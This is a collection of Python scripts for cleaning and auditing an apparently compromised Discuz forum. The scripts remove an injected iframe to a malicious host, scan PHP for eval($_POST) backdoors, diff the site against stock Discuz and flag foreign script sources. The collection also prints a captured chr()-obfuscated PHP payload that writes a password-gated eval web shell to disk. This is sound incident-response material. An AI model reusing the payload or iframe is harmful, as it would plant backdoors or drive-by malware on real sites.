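import os
import sys
import re

# Web root to clean; "./" means the script is run from inside the site directory.
n = "./"

# Injected markup to strip from every file under the web root.
# Keeping the literal split in two means this script's own source never
# contains the full needle, so the script is not rewritten when it lives
# inside the tree it is cleaning.
# Bytes, because files are read and rewritten byte-for-byte below.
js = b"<iframe src=http://asd3.9966.org/kuaile123/4.htm" + b" width=111 height=0 border=0></iframe>"

# NOTE: files are rewritten in place, which also changes their mtime; copy the
# tree first if the timestamps are needed for the incident timeline.
# NOTE: this removes the injected markup only; whatever had write access to
# the files is not addressed here.
for root, dirs, files in os.walk(n):
    for f in files:
        path = os.path.join(root, f)

        # Binary mode: a text-mode read/write round trip can alter bytes
        # (newline translation), which would damage non-text files.
        try:
            with open(path, "rb") as fh:
                sContent = fh.read()
        except (IOError, OSError) as err:
            # One unreadable file must not abort the whole sweep.
            sys.stderr.write("skip %s: %s\n" % (path, err))
            continue

        if js not in sContent:
            continue

        # Report every infected file, including those left untouched below.
        print(path)

        s = sContent.replace(js, b"")
        # A file that held nothing but the injected markup would become
        # empty; it is reported above but not rewritten.
        if s:
            try:
                with open(path, "wb") as fh:
                    fh.write(s)
            except (IOError, OSError) as err:
                sys.stderr.write("cannot rewrite %s: %s\n" % (path, err))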
查找所有 eval($_POST)类似代码
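import os
import sys
import re

# Web root to scan.
n = "./"

# Matches eval( $_POST / $_GET / $_REQUEST / $_COOKIE with optional
# whitespace, case-insensitively. $_REQUEST and $_COOKIE are added to the
# original post|get alternatives because they carry request-supplied data too.
# NOTE: this is a literal-text match. A payload assembled at runtime (for
# example from chr() calls) contains no literal "eval($_POST" and will not
# match, so a clean result here does not prove the tree is clean.
p = re.compile(br"eval([ \t\n\r]*)\(([ \t\n\r]*)\$_(post|get|request|cookie)([ \t\n\r]*)", re.I)

for root, dirs, files in os.walk(n):
    for f in files:
        # Check the extension before reading, so large non-PHP files
        # (uploads, images) are never loaded or searched.
        # NOTE(review): only names ending in lower-case ".php" are scanned;
        # depending on server configuration other extensions may also be
        # executed as PHP -- confirm and extend if so.
        if not f.endswith(".php"):
            continue

        path = os.path.join(root, f)
        try:
            with open(path, "rb") as fh:
                sContent = fh.read()
        except (IOError, OSError) as err:
            # One unreadable file must not abort the whole scan.
            sys.stderr.write("skip %s: %s\n" % (path, err))
            continue

        m = p.search(sContent)
        if m:
            print(path)
            # Only the first match per file is shown; the matched text is
            # ASCII by construction of the pattern.
            print("   " + m.group().decode("ascii"))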
比较论坛代码与原始dz代码有哪些文件不同
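import os
import filecmp

# Pristine copy of the Discuz distribution used as the reference tree.
dzpath = "/home/kenvin/discuz/upload/"
# Live forum web root that is being checked.
webpath = "/data/forum"

# Walk with relative paths so the same relative name can be looked up
# under dzpath.
os.chdir(webpath)

for root, dirs, files in os.walk("."):
    # Directories whose path contains one of these fragments are skipped.
    # NOTE(review): PHP files inside the skipped directories are never
    # compared or reported, so a file dropped there goes unnoticed by this
    # script -- check those directories separately.
    if root.find('/attachments') != -1 or root.find('/data') != -1 or root.find('/forumdata') != -1:
        continue

    for f in files:
        if not f.endswith(".php"):
            continue

        mine = os.path.join(root, f)
        stock = os.path.join(dzpath, root, f)

        # The collapsed listing leaves the indentation of the final "else"
        # ambiguous; it is read here as belonging to the existence test,
        # i.e. a file with no counterpart in the reference tree is reported
        # by name alone.
        if not os.path.exists(stock):
            print(mine)
            continue

        mysize = os.path.getsize(mine)
        size = os.path.getsize(stock)
        if mysize != size:
            print("%s \t %s %s" % (mine, mysize, size))
        elif not filecmp.cmp(mine, stock, shallow=False):
            # Equal size does not mean equal content: a modified file can be
            # padded or trimmed to the original length, so the bytes are
            # compared as well.
            print("%s \t %s %s \t same size, content differs" % (mine, mysize, size))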
变量名:
','');fputs(fopen(chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(40).chr(115).chr(117).chr(98).chr(115).chr(116).chr(114).chr(40).chr(109).chr(100).chr(53).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(98).chr(39).chr(93).chr(41).chr(44).chr(50).chr(56).chr(41).chr(61).chr(61).chr(39).chr(55).chr(97).chr(97).chr(97).chr(39).chr(41).chr(32).chr(38).chr(38).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));//
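import re
import urllib

# Page to monitor for injected external resources (Python 2: urllib.urlopen).
url = "http://forum.techweb.com.cn"

# Hosts that are expected to serve scripts/iframes on this page.
olist = ['techweb.adsame.com', 'www.techweb.com.cn', 'www.google-analytics.com']

# <script|iframe ... src=SCHEME//HOST...>
#   group 1: tag name
#   group 2: scheme part -- "http://", "https://" or protocol-relative "//"
#            (the original pattern accepted "http://" only, so an https or
#            protocol-relative src was never checked against the allowlist)
#   group 3: everything up to the first "/", space, quote or ">" -- the host
p = re.compile(
    r"<(script|iframe)[^>]+src[\s]*=[\s]*['\"]?((?:https?:)?//)(.*?)['\"]?[ />]",
    re.I | re.S,
)

# NOTE: only static src attributes in the HTML fetched from this one URL are
# inspected; resources added by script at render time are not seen.
resp = urllib.urlopen(url)
try:
    c = resp.read()
finally:
    resp.close()

m = p.findall(c)
for n in m:
    # Host names are case-insensitive; compare in lower case so a differently
    # cased allowlisted host is not reported.
    if n[2].lower() not in olist:
        msg = url + " find " + n[0] + " src=" + n[1] + n[2]
        print(msg)
        # send(msg, True)  -- alert hook from the original listing; send() is
        # not defined in this script.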